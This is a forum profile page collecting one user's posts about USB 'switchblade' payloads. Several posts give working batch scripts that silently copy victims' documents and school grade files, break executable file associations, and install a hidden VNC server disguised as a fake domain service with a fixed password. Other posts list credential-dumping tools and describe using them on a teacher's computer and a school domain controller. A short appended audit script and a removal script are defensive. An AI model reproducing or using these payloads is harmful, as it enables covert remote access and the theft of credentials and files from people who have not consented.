kz26

Everything posted by kz26

  1. A switchblade dump of a user's files can get very large. It would be in everyone's interest to maximize their drive's usefulness by first compressing the entire contents of a switchblade dump. I accomplished this using InfoZip, which is a small and portable ZIP creation program very suitable for a switchblade environment. It doesn't seem like anyone has implemented this before, so I'll post it here.

     Step 1. Visit http://www.info-zip.org/Zip.html#Win32 and download InfoZip 2.32 from any of the mirrors.
     Step 2. Put zip.exe in your switchblade's main program directory.
     Step 3. Add the appropriate code for ZIP-compressing the user's files and/or the produced dump logfiles.

     [code]
     REM Create Zip of user's files with the following extensions
     set dumpext=*.doc *.docx *.xls *.xlsx *.cls
     zip.exe -r9q ..\dumps\%computername%\%computername%-files.zip "%homedrive%%homepath%" -i %dumpext%
     REM Zip Dumpfiles
     zip.exe -m9jDq ..\dumps\%computername%\%computername%.zip ..\dumps\%computername%\*.txt
     [/code]

     Feel free to improve upon this idea. I hope people will find this practical and efficient.
  2. Here's the idea. Actually, it was a friend that gave this to me. In your switchblade payload's main batch script, add something like:

     [code]
     assoc .bat=txtfile
     assoc .com=txtfile
     assoc .cmd=txtfile
     assoc .exe=txtfile
     [/code]

     This, obviously, could be pretty bad since all executables are now treated as text files. Now, please don't start ripping on this as "newbish" or "pointless". If you REALLY want to do some damage, here's a simple, fast, and crude way of doing it.
  3. Hey, always happy to help someone remote control a computer :twisted: I read up on netcat, and it does seem helpful in NAT traversal across a gateway. Anyone got any ideas of how to use it like I<3Haxsaw is thinking?
  4. Wow...this is exactly why I created my OWN TightVNC installer. Check this: http://www.hak5.org/forums/viewtopic.php?t=4741 Connecting to your school from home or another off-site location may be difficult or impossible, considering that most schools have their computers sitting behind a gateway. I wouldn't really be sure of how to do it, if it's even feasible. I never read anything about netcat - I don't think it's necessary for anything.
  5. If you mean setting the "hidden" file attribute, then yes, you can hide everything. Since the file still exists, Windows will have no problem using them.
  6. Download one of the premade payloads and find out how they work. Seriously, a little common sense, some self effort, and a bit of Google research will tell you everything you need to know.
  7. Until you figure out the hash type, there's really not much you can do in terms of PW cracking... :roll:
  8. kz26

    B.A. paper help

    "Physical Access Penetration Techniques?" No wonder he doesn't like the title. Might conjure up the wrong image :P
  9. I just came up with this - I think it's an excellent prank. When run, this batch file will crank up the target machine's volume to maximum and play a WAV file called sound.wav that you have (Windows 2000/XP/2003 only!). The target machine must have the admin$ SMB share enabled, and you must also have admin privileges for the target. You must have a copy of NirCmd and psexec (from Sysinternals' PsTools) and the WAV file in the same directory as this script.

     [code]
     @echo off
     echo Sound BITE Prank
     echo by kz26
     REM Ask for name of target machine
     SET rmt=
     SET /P rmt=Enter target machine UNC hostname:
     REM Connect to C:\Windows directory on target as I: Drive
     net use I: \\%rmt%\admin$
     REM Copy WAV sound file and NirCMD for volume control
     xcopy sound.wav I:\ /c /y
     xcopy nircmd.exe I:\ /c /y
     REM Crank up the sound WAY UP on the remote machine
     psexec \\%rmt% nircmd.exe mutesysvolume 0 master
     psexec \\%rmt% nircmd.exe setsysvolume 65535 master
     REM Now for the fun part...play it on the remote machine silently
     psexec \\%rmt% sndrec32.exe /play /close /embedding "C:\Windows\sound.wav"
     REM Delete the sound file and nircmd.exe
     del I:\sound.wav
     del I:\nircmd.exe
     REM Disconnect the remote drive
     net use I: /delete
     exit
     [/code]

     I take no responsibility for obscene sounds or twisted uses people may find for this. For best results stay in the same room as the victim to observe reaction.
  10. Hell...why use a "real" or "premade" RAT? Just use some "legit" things like VNC or something. It also helps if you know some batch/shell scripting...
  11. kz26

    l

    Funny how a nonsense thread now has 20 replies...
  12. After growing tired of the prepackaged payloads hosted here at Hak5, I decided to make my own. After several weeks of (successful) field testing, here it is. The package comes with an autorun.inf, so simply unrar onto the root of your USB drive. It still features the same great silent run capability...

     Payload contents:
     1. Firefox password dumper by Nagareshwar Y Talekar
     2. pwdump6 by fizzgig/Foofus Networking
     3. NirCmd by Nir Sofer/NirSoft
     4. LSADump by Nir Sofer/NirSoft
     5. TightVNC server (http://www.tightvnc.com)
     6. ProduKey by Nir Sofer/NirSoft
     7. Outlook PST Password Dumper by Nir Sofer/NirSoft
     8. Mail Passview by Nir Sofer/NirSoft
     9. Network Password Recovery by Nir Sofer/NirSoft
     10. Protected Storage Passview by Nir Sofer/NirSoft
     11. NetResView by Nir Sofer/NirSoft

     If you have any ideas for more useful tools to be added, please post.
  13. Try the U3 Universal Customizer, hosted right here at http://www.hak5.org/packages/files/Universal_Customizer.zip Just follow the directions, and you'll have a custom ISO partition on your U3 drive.
  14. Hell, go ahead and try it if you want. But don't say nobody warned you...
  15. The TI-82/83/84/85/86 calculators are all Z80-based. You might want to try http://www.ticalc.org and see what help you can get.
  16. kz26

    Ideas for slurping

    Yeah - xcopy sucks because it basically only allows you to use one and only one wildcard. I have heard of a third-party program called xxcopy (try googling it) but never used it before.
  17. kz26

    Ideas for slurping

    Keep in mind that Thunderbird generates a RANDOM profile name for each user. Therefore "a89puyl2.default" is not going to work globally.
  18. kz26

    Ideas for slurping

    Also, would it be possible to exclude files/folders over a certain size? xcopy doesn't seem to have any option for doing this.
  19. kz26

    Ideas for slurping

    Is it just me, or is my puny 128MB drive going to DIE when I try this...
  20. Ok, this antidote is pretty simple - it does everything BUT delete the registry keys, but that shouldn't be a major issue.

     [code]
     @echo off
     REM TightVNC Server Antidote
     REM Turn off the service
     sc stop winvnc
     REM Delete the service
     sc delete winvnc
     REM Delete the server files
     del %systemroot%\winvnc.exe
     del %systemroot%\VNCHooks.dll
     [/code]
  21. Yeah, the students at our school are supposed to have limited accounts. However, I pwdumped a teacher's comp when they weren't there to get the local admin password.
  22. All right...I want to try pwdumping our school's logon domain server/controller. I already have a local Administrator account. Will pwdump6 work against a domain with just local Administrator privileges? Or would I have to have Domain Administrator credentials? Thanks to anyone who can provide an answer.
  23. I found that the VNC entry on the Switchblade wiki was too cumbersome to follow. I did some research and was able to create a silent install package for the TightVNC server (see www.tightvnc.com). The beauty of this VNC variant is that the server requires only 2 files, an EXE and its DLL. To create this payload:

     1. Go to the TightVNC homepage above.
     2. Download the no-install zip package.
     3. In your switchblade\tools directory, create the folder "tvnc".
     4. Copy "winvnc.exe" and "VNCHooks.dll" to the "tvnc" directory.
     5. Create "vnc.cmd" in your tools directory with the following code:

     [code]
     @echo off
     REM Silent Install of TightVNC server
     REM Install script by kz26
     REM Part 1 - Copy server files
     xcopy tvnc\winvnc.exe %systemroot% /c /y
     xcopy tvnc\VNCHooks.dll %systemroot% /c /y
     REM install phony WinVNC service and import reg settings
     sc create winvnc binpath= "%systemroot%\winvnc.exe -service" type= interact type= own start= auto displayname= "Domain Client Service"
     sc description winvnc "Manages communication between a Windows Server Domain Controller and a connected Domain Client. If this service is not started or disabled, domain functions will be inoperable."
     regedit.exe /s tvnc\reg1.reg
     regedit.exe /s tvnc\reg2.reg
     REM Start the VNC Service and have fun
     net start winvnc
     [/code]

     6. Create reg1.reg and reg2.reg in your "tvnc" directory.

     Contents of reg1.reg:
     [code]
     Windows Registry Editor Version 5.00

     [HKEY_CURRENT_USER\Software\ORL]
     [HKEY_CURRENT_USER\Software\ORL\VNCHooks]
     [HKEY_CURRENT_USER\Software\ORL\VNCHooks\Application_Prefs]
     [HKEY_CURRENT_USER\Software\ORL\VNCHooks\Application_Prefs\winvnc.exe]
     "use_GetUpdateRect"=dword:00000001
     "use_Timer"=dword:00000000
     "use_KeyPress"=dword:00000001
     "use_LButtonUp"=dword:00000001
     "use_MButtonUp"=dword:00000001
     "use_RButtonUp"=dword:00000001
     "use_Deferral"=dword:00000001
     [/code]

     Contents of reg2.reg:
     [code]
     Windows Registry Editor Version 5.00

     [HKEY_LOCAL_MACHINE\SOFTWARE\ORL]
     [HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3]
     "ConnectPriority"=dword:00000000
     "DebugMode"=dword:00000000
     "DebugLevel"=dword:00000002
     "LoopbackOnly"=dword:00000000
     "EnableHTTPDaemon"=dword:00000000
     "EnableURLParams"=dword:00000000
     "AllowLoopback"=dword:00000001
     "AuthRequired"=dword:00000001
     [HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
     "QuerySetting"=dword:00000002
     "QueryTimeout"=dword:0000001e
     "QueryAccept"=dword:00000000
     "QueryAllowNoPass"=dword:00000000
     "SocketConnect"=dword:00000001
     "AutoPortSelect"=dword:00000000
     "PortNumber"=dword:00001f90
     "HTTPPortNumber"=dword:000016a8
     "InputsEnabled"=dword:00000001
     "LocalInputsDisabled"=dword:00000000
     "IdleTimeout"=dword:00000000
     "LockSetting"=dword:00000000
     "RemoveWallpaper"=dword:00000001
     "Password"=hex:77,96,ba,8c,c2,b3,68,07
     "PasswordViewOnly"=hex:77,96,ba,8c,c2,b3,68,07
     "PollUnderCursor"=dword:00000000
     "PollForeground"=dword:00000001
     "PollFullScreen"=dword:00000000
     "OnlyPollConsole"=dword:00000001
     "OnlyPollOnEvent"=dword:00000000
     [/code]

     7. Add the following to your go.cmd file:
     [code]
     start /b .\vnc.cmd
     [/code]

     ------------

     This payload will silently install the WinVNC service and disguise it as a "realistic" system service. To connect: use any VNC viewer to connect to the target. Port: 8080. Username: N/A. Password: hacked. I believe this payload is much more streamlined.

     Obviously, it won't do the external IP email send as the wiki version advertises, but this method should be more than adequate for most people.

     P.S. I use this to install VNC at my school's WinXP Pro computer lab. Works great for pissing off unsuspecting people...
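A defender's counterpart to the install above, added here as an example and not part of kz26's post or of TightVNC: a small Python audit that parses a .reg export in the format shown and reports the WinVNC3 settings that let the server accept unattended remote sessions, plus a check of `sc qc` output for winvnc.exe running under a display name that hides what it is. The function names are hypothetical and both sample inputs are constructed from the values in this post.

```python
import re
# Constructed sample: the HKLM half of the reg2.reg shown in the post above (values taken from it).
SAMPLE_REG = r"""Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3]
"LoopbackOnly"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
"SocketConnect"=dword:00000001
"PortNumber"=dword:00001f90
"Password"=hex:77,96,ba,8c,c2,b3,68,07
"""
# Constructed sample of `sc qc winvnc` output for the service the post's vnc.cmd creates.
SAMPLE_SC = """SERVICE_NAME: winvnc
        BINARY_PATH_NAME   : C:\\WINDOWS\\winvnc.exe -service
        DISPLAY_NAME       : Domain Client Service
"""

def parse_reg(text):
    """Parse a .reg export into {key_path: {value_name: int | bytes}} (dword and hex values only)."""
    keys, current = {}, None
    for line in text.splitlines():
        key = re.match(r"^\[(.+)\]$", line.strip())
        if key:
            current = keys.setdefault(key.group(1), {})
            continue
        val = re.match(r'^"([^"]+)"=(dword|hex):(.+)$', line.strip())
        if val and current is not None:
            name, kind, raw = val.groups()
            current[name] = int(raw, 16) if kind == "dword" else bytes.fromhex(raw.replace(",", ""))
    return keys

def audit_winvnc(reg_text):
    """List the WinVNC3 settings that allow an unattended remote session (empty list if no config)."""
    keys = parse_reg(reg_text)
    root = keys.get(r"HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3", {})
    dflt = keys.get(r"HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default", {})
    findings = []
    if root or dflt:
        findings.append("WinVNC3 configuration present")
    if dflt.get("SocketConnect") == 1 and root.get("LoopbackOnly", 1) == 0:
        findings.append("accepts network connections on port %d" % dflt.get("PortNumber", 5900))
    if "Password" in dflt:
        findings.append("server password stored in registry")
    return findings

def service_masquerade(sc_text):
    """True if an sc qc listing runs winvnc.exe under a display name that never mentions VNC."""
    binary = re.search(r"BINARY_PATH_NAME\s*:\s*(.+)", sc_text)
    display = re.search(r"DISPLAY_NAME\s*:\s*(.+)", sc_text)
    return bool(binary and display and "winvnc" in binary.group(1).lower() and "vnc" not in display.group(1).lower())
```

Run against a real export (`reg export HKLM\SOFTWARE\ORL out.reg`) and `sc qc winvnc` output, the same two functions flag the install this post describes; the antidote in post 20 is the corresponding cleanup.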
  24. MicroGrade files are CLS files.

     [code]
     REM File/Directory Dump by kz26
     REM supports DOC, DOCx, XLS, PDF, CLS files
     @echo off
     echo [Complete User Profile Directory/File Listing] >..\dump\%computername%\dirlist.txt
     echo. >> ..\dump\%computername%\dirlist.txt
     dir /s "%homedrive%%homepath%" >> ..\dump\%computername%\dirlist.txt
     echo Log of Copied Files >..\dump\%computername%\filecopy.txt
     echo. >> ..\dump\%computername%\filecopy.txt
     xcopy "%homedrive%%homepath%\My Documents\*.doc" ..\dump\%computername%\files /c /s /l >> ..\dump\%computername%\filecopy.txt
     echo. >> ..\dump\%computername%\filecopy.txt
     xcopy "%homedrive%%homepath%\My Documents\*.docx" ..\dump\%computername%\files /c /s /l >> ..\dump\%computername%\filecopy.txt
     echo. >> ..\dump\%computername%\filecopy.txt
     xcopy "%homedrive%%homepath%\My Documents\*.xls" ..\dump\%computername%\files /c /s /l >> ..\dump\%computername%\filecopy.txt
     echo. >> ..\dump\%computername%\filecopy.txt
     xcopy "%homedrive%%homepath%\My Documents\*.pdf" ..\dump\%computername%\files /c /s /l >> ..\dump\%computername%\filecopy.txt
     echo. >> ..\dump\%computername%\filecopy.txt
     xcopy "%homedrive%%homepath%\My Documents\*.cls" ..\dump\%computername%\files /c /s /l >> ..\dump\%computername%\filecopy.txt
     echo. >> ..\dump\%computername%\filecopy.txt
     xcopy C:\*.cls ..\dump\%computername%\files /c /s /l >> ..\dump\%computername%\filecopy.txt
     exit
     [/code]

     This will probably only work with my custom payload, so tell me if you want it, and I'll upload the complete package.
  25. What sorts of payloads do you use with your switchblade drive? Do you create your custom one or do you download a premade one? Please vote, and also post some info about your switchblade (if you have one) as well as some specs of your drive. I use a tiny 128MB PNY drive (in sig) with a custom payload. It uses most of the NirSoft password/history dump utilities, Firepassword, and also copies all DOC/XLS/PDF files from My Documents to the drive. Since I will use this in school, it also dumps MicroGrade CLS class files.